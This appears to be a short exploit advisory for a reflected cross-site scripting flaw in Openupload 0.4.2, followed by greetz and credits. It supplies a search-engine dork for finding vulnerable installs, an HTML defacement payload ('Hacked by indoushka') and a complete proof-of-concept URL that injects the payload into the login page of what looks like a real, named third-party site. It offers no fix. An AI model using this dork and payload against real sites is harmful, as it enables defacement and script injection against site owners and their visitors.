========================================================================
| # Title : Openupload 0.4.2 Xss vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 10 Français V.(Pro)
| # Version : 0.4.2
| # Vendor : http://wmscripti.com/
| # Dork : open upload - login
========================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
https://ftp.televerbier.ch/index.php?action=login&lang=fr&step=1%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E
Greetz : ⵏⴻⴽⴽⴰⴰ ⵙⴰⵍⴰⵀ ⴻⴷⴷⵉⵏⴻ------ⵯⵉⵯⴰ ⴰⵎⴰⵣⵉⴳⴻⵏ-------- ⵎⴰⵅⵡⴻⵍⵍ ⵛⴰⵛⵀⴷoⵍⵍⴰⵔ ------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz |
|
===================== pⴰⵛⴽⴻⵜ ⵙⵜoⵔⵎ ⵙⴻⵛⵓⵔⵉⵜⵢ =============================